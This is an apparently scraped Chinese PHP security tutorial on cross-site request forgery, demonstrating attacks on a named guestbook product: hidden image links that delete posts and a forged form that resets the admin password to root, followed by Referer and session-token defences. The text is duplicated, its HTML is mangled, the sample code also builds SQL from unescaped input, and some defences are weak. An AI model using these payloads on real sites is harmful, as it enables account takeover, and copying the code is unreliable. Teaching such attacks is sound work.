PHP漏洞全解-跨網(wǎng)站請求偽造

CSRF(Cross Site Request Forgeries)，意為跨網(wǎng)站請求偽造，也有寫為XSRF。攻擊者偽造目標用戶的HTTP請求，然后此請求發(fā)送到有CSRF漏洞的網(wǎng)站，網(wǎng)站執(zhí)行此請求后，引發(fā)跨站請求偽造攻擊。攻擊者利用隱蔽的HTTP連接，讓目標用戶在不注意的情況下單擊這個鏈接，由于是用戶自己點擊的，而他又是合法用戶擁有合法權(quán)限，所以目標用戶能夠在網(wǎng)站內(nèi)執(zhí)行特定的HTTP鏈接，從而達到攻擊者的目的。

例如:某個購物網(wǎng)站購買商品時，采用http://www.shop.com/buy.php?item=watch&num=1，item參數(shù)確定要購買什么物品，num參數(shù)確定要購買數(shù)量，如果攻擊者以隱藏的方式發(fā)送給目標用戶鏈接

，那么如果目標用戶不小心訪問以后，購買的數(shù)量就成了1000個

實例

隨緣網(wǎng)絡(luò)PHP留言板V1.0

任意刪除留言

//delbook.php 此頁面用于刪除留言

include_once("dlyz.php"); //dlyz.php用戶驗證權(quán)限，當權(quán)限是admin的時候方可刪除留言 
include_once("../conn.php"); 
$del=$_GET["del"]; 
$id=$_GET["id"]; 
if ($del=="data") 
{ 
    $ID_Dele= implode(",",$_POST['adid']); 
    $sql="delete from book where id in (".$ID_Dele.")"; 
    mysql_query($sql); 
} 
else 
{ 
    $sql="delete from book where id=".$id; //傳遞要刪除的留言ID 
    mysql_query($sql); 
} 
mysql_close($conn); 
echo ""; 
echo "alert(‘刪除成功！’);"; 
echo " location=’book.php’;"; 
echo ""; 
?> 

當我們具有admin權(quán)限，提交http://localhost/manage/delbook.php?id=2 時，就會刪除id為2的留言

利用方法:

我們使用普通用戶留言（源代碼方式），內(nèi)容為

"delbook.php?id=2" /> 
"delbook.php?id=3" /> 
"delbook.php?id=4" /> 
"delbook.php?id=5" /> 

插入4張圖片鏈接分別刪除4個id留言，然后我們返回首頁瀏覽看，沒有什么變化。。圖片顯示不了

現(xiàn)在我們再用管理員賬號登陸后，來刷新首頁，會發(fā)現(xiàn)留言就剩一條，其他在圖片鏈接中指定的ID號的留言，全部都被刪除。

攻擊者在留言中插入隱藏的圖片鏈接，此鏈接具有刪除留言的作用，而攻擊者自己訪問這些圖片鏈接的時候，是不具有權(quán)限的，所以看不到任何效果，但是當管理員登陸后，查看此留言，就會執(zhí)行隱藏的鏈接，而他的權(quán)限又是足夠大的，從而這些留言就被刪除了

修改管理員密碼

//pass.php 
if($_GET["act"]) 
{ 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計制作：廈門隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
if(emptyempty($_POST["password"])) 
{ 
    $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
else 
{ 
    $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

這個文件用于修改管理密碼和網(wǎng)站設(shè)置的一些信息，我們可以直接構(gòu)造如下表單:

<body> 
    <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
    <input type="radio" value="1" name="sh"> 
    <input type="radio" name="sh" checked value="0"> 
    <input type="text" name="username" value="root"> 
    <input type="password" name="password" value="root"> 
    <input type="text" name="title" value="隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)" > 
    <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)！textarea> 
    <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡(luò)PHP留言本V1.0 版權(quán)所有：廈門隨緣網(wǎng)絡(luò)科技 2005-2009<br/>承接網(wǎng)站建設(shè)及系統(tǒng)定制 提供優(yōu)惠主機域名textarea> 
    form> 
body> 

存為attack.html，放到自己網(wǎng)站上http://www.sectop.com/attack.html，此頁面訪問后會自動向目標程序的pass.php提交參數(shù)，用戶名修改為root，密碼修改為root，然后我們?nèi)チ粞园灏l(fā)一條留言，隱藏這個鏈接，管理訪問以后，他的用戶名和密碼全部修改成了root

防范方法

防范CSRF要比防范其他攻擊更加困難，因為CSRF的HTTP請求雖然是攻擊者偽造的，但是卻是由目標用戶發(fā)出的，一般常見的防范方法有下面幾種:

1、檢查網(wǎng)頁的來源

2、檢查內(nèi)置的隱藏變量

3、使用POST，不要使用GET

檢查網(wǎng)頁來源

在//pass.php頭部加入以下紅色字體代碼，驗證數(shù)據(jù)提交

if($_GET["act"]) 
{ 
    if(isset($_SERVER["HTTP_REFERER"])) 
    { 
        $serverhost = $_SERVER["SERVER_NAME"]; 
        $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
        $strdomain = explode("/",$strurl); 
        $sourcehost = $strdomain[0]; 
    if(strncmp($sourcehost, $serverhost, strlen($serverhost))) 
    {
        unset($_POST); 
        echo ""; 
        echo "alert(‘數(shù)據(jù)來源異常!’);"; 
        echo " location=’index.php’;";
        echo ""; 
     } 
     } 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計制作：廈門隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
    if(emptyempty($_POST["password"])) 
    { 
        $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
    else 
    { 
        $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

檢查內(nèi)置隱藏變量

我們在表單中內(nèi)置一個隱藏變量和一個session變量，然后檢查這個隱藏變量和session變量是否相等，以此來判斷是否同一個網(wǎng)頁所調(diào)用

php 
include_once("dlyz.php"); 
include_once("../conn.php"); 
if($_GET["act"]) 
{ 
if (!isset($_SESSION["post_id"])) 
{ 
// 生成唯一的ID，并使用MD5來加密 
$post_id = md5(uniqid(rand(), true)); 
// 創(chuàng)建Session變量 
$_SESSION["post_id"] = $post_id; 
} 
// 檢查是否相等 
if (isset($_SESSION["post_id"])) 
{ 
// 不相等 
if ($_SESSION["post_id"] != $_POST["post_id"]) 
{ 
// 清除POST變量 
unset($_POST); 
echo "<script language=’javascript’>"; 
echo "alert(‘數(shù)據(jù)來源異常!’);"; 
echo " location=’index.php’;"; 
echo "script>"; 
} 
} 
…… 
<input type="reset" name="Submit2" value="重 置"> 
<input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
td>tr> 
table> 
form> 
php 
} 
mysql_close($conn); 
?> 
body> 
html> 

使用POST，不要使用GET

傳遞表單字段時，一定要是用POST，不要使用GET，處理變量也不要直接使用$_REQUEST

當我們具有admin權(quán)限，提交http://localhost/manage/delbook.php?id=2 時，就會刪除id為2的留言

利用方法:

我們使用普通用戶留言（源代碼方式），內(nèi)容為

"delbook.php?id=2" /> 
"delbook.php?id=3" /> 
"delbook.php?id=4" /> 
"delbook.php?id=5" /> 

插入4張圖片鏈接分別刪除4個id留言，然后我們返回首頁瀏覽看，沒有什么變化。。圖片顯示不了

現(xiàn)在我們再用管理員賬號登陸后，來刷新首頁，會發(fā)現(xiàn)留言就剩一條，其他在圖片鏈接中指定的ID號的留言，全部都被刪除。

攻擊者在留言中插入隱藏的圖片鏈接，此鏈接具有刪除留言的作用，而攻擊者自己訪問這些圖片鏈接的時候，是不具有權(quán)限的，所以看不到任何效果，但是當管理員登陸后，查看此留言，就會執(zhí)行隱藏的鏈接，而他的權(quán)限又是足夠大的，從而這些留言就被刪除了

修改管理員密碼

//pass.php 
if($_GET["act"]) 
{ 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計制作：廈門隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
if(emptyempty($_POST["password"])) 
{ 
    $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
else 
{ 
    $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

這個文件用于修改管理密碼和網(wǎng)站設(shè)置的一些信息，我們可以直接構(gòu)造如下表單:

<body> 
    <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
    <input type="radio" value="1" name="sh"> 
    <input type="radio" name="sh" checked value="0"> 
    <input type="text" name="username" value="root"> 
    <input type="password" name="password" value="root"> 
    <input type="text" name="title" value="隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)" > 
    <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡(luò)PHP留言板V1.0(帶審核功能)！textarea> 
    <textarea name="copyright" rows="6" cols="80" >隨緣網(wǎng)絡(luò)PHP留言本V1.0 版權(quán)所有：廈門隨緣網(wǎng)絡(luò)科技 2005-2009<br/>承接網(wǎng)站建設(shè)及系統(tǒng)定制 提供優(yōu)惠主機域名textarea> 
    form> 
body> 

存為attack.html，放到自己網(wǎng)站上http://www.sectop.com/attack.html，此頁面訪問后會自動向目標程序的pass.php提交參數(shù)，用戶名修改為root，密碼修改為root，然后我們?nèi)チ粞园灏l(fā)一條留言，隱藏這個鏈接，管理訪問以后，他的用戶名和密碼全部修改成了root

防范方法

防范CSRF要比防范其他攻擊更加困難，因為CSRF的HTTP請求雖然是攻擊者偽造的，但是卻是由目標用戶發(fā)出的，一般常見的防范方法有下面幾種:

1、檢查網(wǎng)頁的來源

2、檢查內(nèi)置的隱藏變量

3、使用POST，不要使用GET

檢查網(wǎng)頁來源

在//pass.php頭部加入以下紅色字體代碼，驗證數(shù)據(jù)提交

if($_GET["act"]) 
{ 
    if(isset($_SERVER["HTTP_REFERER"])) 
    { 
        $serverhost = $_SERVER["SERVER_NAME"]; 
        $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
        $strdomain = explode("/",$strurl); 
        $sourcehost = $strdomain[0]; 
    if(strncmp($sourcehost, $serverhost, strlen($serverhost))) 
    {
        unset($_POST); 
        echo ""; 
        echo "alert(‘數(shù)據(jù)來源異常!’);"; 
        echo " location=’index.php’;";
        echo ""; 
     } 
     } 
    $username=$_POST["username"]; 
    $sh=$_POST["sh"]; 
    $gg=$_POST["gg"]; 
    $title=$_POST["title"]; 
    $copyright=$_POST["copyright"]."
設(shè)計制作：廈門隨緣網(wǎng)絡(luò)科技"; 
    $password=md5($_POST["password"]); 
    if(emptyempty($_POST["password"])) 
    { 
        $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
    else 
    { 
        $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
    } 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功！’);"; 
echo " location=’pass.php’;"; 
echo ""; 
} 

檢查內(nèi)置隱藏變量

我們在表單中內(nèi)置一個隱藏變量和一個session變量，然后檢查這個隱藏變量和session變量是否相等，以此來判斷是否同一個網(wǎng)頁所調(diào)用

php 
include_once("dlyz.php"); 
include_once("../conn.php"); 
if($_GET["act"]) 
{ 
if (!isset($_SESSION["post_id"])) 
{ 
// 生成唯一的ID，并使用MD5來加密 
$post_id = md5(uniqid(rand(), true)); 
// 創(chuàng)建Session變量 
$_SESSION["post_id"] = $post_id; 
} 
// 檢查是否相等 
if (isset($_SESSION["post_id"])) 
{ 
// 不相等 
if ($_SESSION["post_id"] != $_POST["post_id"]) 
{ 
// 清除POST變量 
unset($_POST); 
echo "<script language=’javascript’>"; 
echo "alert(‘數(shù)據(jù)來源異常!’);"; 
echo " location=’index.php’;"; 
echo "script>"; 
} 
} 
…… 
<input type="reset" name="Submit2" value="重 置"> 
<input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
td>tr> 
table> 
form> 
php 
} 
mysql_close($conn); 
?> 
body> 
html> 

使用POST，不要使用GET

傳遞表單字段時，一定要是用POST，不要使用GET，處理變量也不要直接使用$_REQUEST

服務(wù)器租用/服務(wù)器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]